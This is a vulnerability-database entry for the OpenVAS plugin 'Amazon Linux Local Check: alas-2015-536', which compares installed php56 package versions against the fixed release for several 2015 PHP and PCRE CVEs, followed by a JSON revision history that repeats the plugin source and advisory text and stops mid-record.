ID OPENVAS:1361412562310120222 Type openvas Reporter Eero Volotinen Modified 2018-10-01T00:00:00
Description
Amazon Linux Local Security Checks
###############################################################################
# OpenVAS Vulnerability Test
# $Id: alas-2015-536.nasl 6575 2017-07-06 13:42:08Z cfischer$
#
# Amazon Linux security check
#
# Authors:
# Eero Volotinen <eero.volotinen@iki.fi>
#
# Copyright:
# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.120222");
script_version("$Revision: 11711 $");
script_tag(name:"creation_date", value:"2015-09-08 13:20:42 +0200 (Tue, 08 Sep 2015)");
script_tag(name:"last_modification", value:"$Date: 2018-10-01 14:30:57 +0200 (Mon, 01 Oct 2018) $");
script_name("Amazon Linux Local Check: alas-2015-536");
script_tag(name:"insight", value:"Multiple flaws were found in PHP. Please see the references for more information.");
script_tag(name:"solution", value:"Run yum update php56 to update your system.");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name:"URL", value:"https://alas.aws.amazon.com/ALAS-2015-536.html");
script_cve_id("CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4026", "CVE-2015-2325", "CVE-2015-2326");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"qod_type", value:"package");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/amazon_linux", "ssh/login/release");
script_category(ACT_GATHER_INFO);
script_tag(name:"summary", value:"Amazon Linux Local Security Checks");
script_copyright("Eero Volotinen");
script_family("Amazon Linux Local Security Checks");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
release = rpm_get_ssh_release();
if(!release) exit(0);
res = "";
if(release == "AMAZON")
{
if ((res = isrpmvuln(pkg:"php56-ldap", rpm:"php56-ldap~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-bcmath", rpm:"php56-bcmath~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-cli", rpm:"php56-cli~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-intl", rpm:"php56-intl~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-devel", rpm:"php56-devel~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-common", rpm:"php56-common~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-imap", rpm:"php56-imap~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-gd", rpm:"php56-gd~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-mysqlnd", rpm:"php56-mysqlnd~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-mssql", rpm:"php56-mssql~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-enchant", rpm:"php56-enchant~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-debuginfo", rpm:"php56-debuginfo~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-process", rpm:"php56-process~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-fpm", rpm:"php56-fpm~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-pdo", rpm:"php56-pdo~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-odbc", rpm:"php56-odbc~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-xml", rpm:"php56-xml~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-mcrypt", rpm:"php56-mcrypt~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-recode", rpm:"php56-recode~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-dba", rpm:"php56-dba~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-xmlrpc", rpm:"php56-xmlrpc~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-pgsql", rpm:"php56-pgsql~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-mbstring", rpm:"php56-mbstring~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-pspell", rpm:"php56-pspell~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56", rpm:"php56~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-embedded", rpm:"php56-embedded~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-gmp", rpm:"php56-gmp~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-soap", rpm:"php56-soap~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-opcache", rpm:"php56-opcache~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-tidy", rpm:"php56-tidy~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-snmp", rpm:"php56-snmp~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"php56-dbg", rpm:"php56-dbg~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99);
exit(0);
}
{"id": "OPENVAS:1361412562310120222", "bulletinFamily": "scanner", "title": "Amazon Linux Local Check: alas-2015-536", "description": "Amazon Linux Local Security Checks", "published": "2015-09-08T00:00:00", "modified": "2018-10-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120222", "reporter": "Eero Volotinen", "references": ["https://alas.aws.amazon.com/ALAS-2015-536.html"], "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "type": "openvas", "lastseen": "2018-10-02T14:30:19", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Amazon Linux Local Security Checks", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ec8f76fd6c3cae45185c4870c04a1ef726c52b881ccec4b4fb0f8457c0e8841e", "hashmap": [{"hash": "774d0176dfa389c0c71e9e200f95a6ba", "key": "modified"}, {"hash": "135e225c708bd184a2226d1dab09a629", "key": "sourceData"}, {"hash": "051d3fa80639370fd8e85d743d26684b", "key": "cvelist"}, {"hash": "15a1c50a40bcb97a18bd75742b61fd60", "key": "pluginID"}, {"hash": "166e43b7efd51fc461aa157ed9ed169d", "key": "published"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "c987a25a392ca9438af43d057067b21a", "key": "href"}, {"hash": "df5cd238ab6ba820ee0b13c493f1bcd6", "key": "naslFamily"}, {"hash": "73a8d6ff1a2cd0ef2d387ce18a30cf50", "key": "title"}, {"hash": "df5cd238ab6ba820ee0b13c493f1bcd6", "key": "description"}, {"hash": "260dd5f8477dc74ecc091d01197c5f94", "key": "references"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120222", "id": "OPENVAS:1361412562310120222", "lastseen": "2018-08-30T19:21:55", "modified": "2017-07-06T00:00:00", "naslFamily": "Amazon Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310120222", "published": "2015-09-08T00:00:00", "references": ["https://alas.aws.amazon.com/ALAS-2015-536.html"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Amazon Linux security check \n# $Id: alas-2015-536.nasl 6575 2017-07-06 13:42:08Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@iki.fi> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.120222\");\nscript_version(\"$Revision: 6575 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-08 13:20:42 +0200 (Tue, 08 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:42:08 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Amazon Linux Local Check: alas-2015-536\");\nscript_tag(name: \"insight\", value: \"An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-4021 )An integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022 )A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4025 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026 )PCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2325 )PCRE library is prone to a vulnerability which leads to Heap overflow. Without enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2326 )\"); \nscript_tag(name : \"solution\", value : \"Run yum update php56 to update your system.\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://alas.aws.amazon.com/ALAS-2015-536.html\");\nscript_cve_id(\"CVE-2015-4021\",\"CVE-2015-4022\",\"CVE-2015-4025\",\"CVE-2015-4024\",\"CVE-2015-4026\",\"CVE-2015-2325\",\"CVE-2015-2326\");\nscript_tag(name:\"cvss_base\", value:\"7.5\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Amazon Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n}\n", "title": "Amazon Linux Local Check: alas-2015-536", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:21:55"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Amazon Linux Local Security Checks", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "465b42b1c14295fa4e5071e396ed5f0d054197109c51db354cf2598ac0796896", "hashmap": [{"hash": "774d0176dfa389c0c71e9e200f95a6ba", "key": "modified"}, {"hash": "135e225c708bd184a2226d1dab09a629", "key": "sourceData"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "051d3fa80639370fd8e85d743d26684b", "key": "cvelist"}, {"hash": "15a1c50a40bcb97a18bd75742b61fd60", "key": "pluginID"}, {"hash": "166e43b7efd51fc461aa157ed9ed169d", "key": "published"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "c987a25a392ca9438af43d057067b21a", "key": "href"}, {"hash": "df5cd238ab6ba820ee0b13c493f1bcd6", "key": "naslFamily"}, {"hash": "73a8d6ff1a2cd0ef2d387ce18a30cf50", "key": "title"}, {"hash": "df5cd238ab6ba820ee0b13c493f1bcd6", "key": "description"}, {"hash": "260dd5f8477dc74ecc091d01197c5f94", "key": "references"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120222", "id": "OPENVAS:1361412562310120222", "lastseen": "2017-07-24T12:53:50", "modified": "2017-07-06T00:00:00", "naslFamily": "Amazon Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310120222", "published": "2015-09-08T00:00:00", "references": ["https://alas.aws.amazon.com/ALAS-2015-536.html"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test \n# Description: Amazon Linux security check \n# $Id: alas-2015-536.nasl 6575 2017-07-06 13:42:08Z cfischer $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@iki.fi> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.120222\");\nscript_version(\"$Revision: 6575 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-08 13:20:42 +0200 (Tue, 08 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:42:08 +0200 (Thu, 06 Jul 2017) $\");\nscript_name(\"Amazon Linux Local Check: alas-2015-536\");\nscript_tag(name: \"insight\", value: \"An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-4021 )An integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022 )A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4025 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026 )PCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2325 )PCRE library is prone to a vulnerability which leads to Heap overflow. Without enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2326 )\"); \nscript_tag(name : \"solution\", value : \"Run yum update php56 to update your system.\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://alas.aws.amazon.com/ALAS-2015-536.html\");\nscript_cve_id(\"CVE-2015-4021\",\"CVE-2015-4022\",\"CVE-2015-4025\",\"CVE-2015-4024\",\"CVE-2015-4026\",\"CVE-2015-2325\",\"CVE-2015-2326\");\nscript_tag(name:\"cvss_base\", value:\"7.5\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Amazon Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.9~1.112.amzn1\", 